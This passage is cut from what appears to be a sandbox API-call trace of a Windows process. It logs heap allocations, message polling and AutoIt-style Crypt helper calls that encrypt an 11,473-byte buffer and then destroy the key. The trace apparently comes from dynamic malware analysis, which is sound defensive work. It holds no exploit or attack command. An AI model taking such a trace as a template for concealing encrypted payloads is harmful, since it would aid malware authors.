returned 1 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.877] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.879] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.880] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.881] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.881] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2cc4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x2cd0) returned 1 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] CharLowerBuffW (in: lpsz="byte[11473]", cchLength=0xb | out: lpsz="byte[11473]") returned 0xb [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.882] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbecce8*, pdwDataLen=0x87e820*=0x2cc4, dwBufLen=0x2cd0 | out: pbData=0xbecce8*, pdwDataLen=0x87e820*=0x2cd0) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.882] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.882] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.883] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.883] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.883] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.883] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.883] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.883] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.883] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.884] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.884] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.884] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.885] CryptDestroyKey (hKey=0x90aed8) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.885] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.885] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.885] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.885] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.885] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.885] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.886] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.886] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 